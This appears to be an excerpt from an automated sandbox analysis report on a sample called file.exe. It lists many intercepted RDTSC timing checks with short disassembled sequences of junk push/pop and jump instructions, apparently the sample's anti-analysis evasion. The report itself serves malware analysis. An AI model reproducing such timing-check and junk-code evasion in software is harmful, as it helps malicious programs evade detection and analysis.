                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4627E second address: C46286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46286 second address: C4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4628C second address: C4629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F9278BE2826h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4629D second address: C462A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F927881D806h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C462A7 second address: C462B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C467DC second address: C467E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C467E3 second address: C467EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C467EB second address: C46802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F927881D80Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46C94 second address: C46C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46C98 second address: C46CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F927881D806h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F927881D80Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46CB5 second address: C46CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46CBB second address: C46D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F927881D814h 0x0000000f jmp 00007F927881D80Dh 0x00000014 jmp 00007F927881D810h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F927881D80Eh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47018 second address: C4702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2830h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4702C second address: C47036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47036 second address: C4703A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4703A second address: C4703E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47177 second address: C4717B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4717B second address: C47186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47186 second address: C47198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47479 second address: C4747D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BB7F second address: C4BB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BCF4 second address: C4BCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BCFA second address: C4BCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BCFE second address: C4BD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BE83 second address: C4BE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C018 second address: C4C027 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C027 second address: C4C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e js 00007F9278BE2826h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jng 00007F9278BE2826h 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C04A second address: C4C04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C04F second address: C4C054 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5EB second address: C4C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5EF second address: C4C5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5F3 second address: C4C5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5F9 second address: C4C62E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9278BE2834h 0x00000008 jmp 00007F9278BE282Dh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 jng 00007F9278BE2826h 0x0000001a pop esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C976 second address: C4C980 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F927881D812h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C980 second address: C4C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFC42F second address: BFC43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F927881D806h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFC43A second address: BFC43F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD39C5 second address: BD39C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD39C9 second address: BD39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9278BE282Fh 0x0000000c jnl 00007F9278BE2826h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD39E8 second address: BD3A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F927881D813h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3A00 second address: BD3A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3A0C second address: BD3A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B711 second address: C4B715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B715 second address: C4B71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C518C6 second address: C518D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51A28 second address: C51A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51A2E second address: C51A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9278BE2826h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F9278BE2826h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51A43 second address: C51A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51E57 second address: C51E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51E5B second address: C51E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F927881D812h 0x0000000c jp 00007F927881D806h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C522A0 second address: C522A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52694 second address: C526AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F927881D806h 0x0000000a jmp 00007F927881D811h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C526AF second address: C526C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F9278BE2826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edi 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C526C3 second address: C526C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56EE0 second address: C56EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9278BE2826h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55D1A second address: C55D1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55D1F second address: C55D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55D25 second address: C55D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12C95 second address: C12C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12C9B second address: C12CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push ecx 0x0000000a xor dl, FFFFFF9Dh 0x0000000d pop edi 0x0000000e lea eax, dword ptr [ebp+124779DEh] 0x00000014 mov cl, bl 0x00000016 nop 0x00000017 jns 00007F927881D814h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12CBB second address: C12CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C12DDF second address: C12DE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C132CA second address: C132EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13469 second address: C1346E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1362B second address: C1363F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2830h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1363F second address: C13644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13E7A second address: C13E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13E80 second address: C13E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55FFD second address: C56001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13CCE second address: C13CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56136 second address: C56145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56145 second address: C56149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56298 second address: C562B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5640A second address: C56410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56410 second address: C56414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56414 second address: C5641A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6202A second address: C62034 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9278BE2826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C62034 second address: C62041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61BD8 second address: C61BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61BDF second address: C61BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F927881D806h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648FB second address: C6490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6490A second address: C64938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D819h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64AA9 second address: C64AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64AAF second address: C64AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64AB3 second address: C64AC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jnc 00007F9278BE2826h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64AC9 second address: C64ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C68F31 second address: C68F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C68F37 second address: C68F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F927881D806h 0x0000000d jmp 00007F927881D80Fh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C68F53 second address: C68F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69099 second address: C690CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F927881D819h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F927881D80Ch 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6951F second address: C69525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C696BB second address: C696BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C696BF second address: C696C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69806 second address: C6980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6980C second address: C6981A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6981A second address: C69820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69820 second address: C69825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69825 second address: C6982C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6982C second address: C69832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69832 second address: C6985F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F927881D806h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F927881D814h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop esi 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B310 second address: C6B333 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9278BE2839h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B333 second address: C6B339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D7C0 second address: C6D7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F9278BE2826h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FE92 second address: C6FEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jns 00007F927881D80Ch 0x0000000d rdtsc
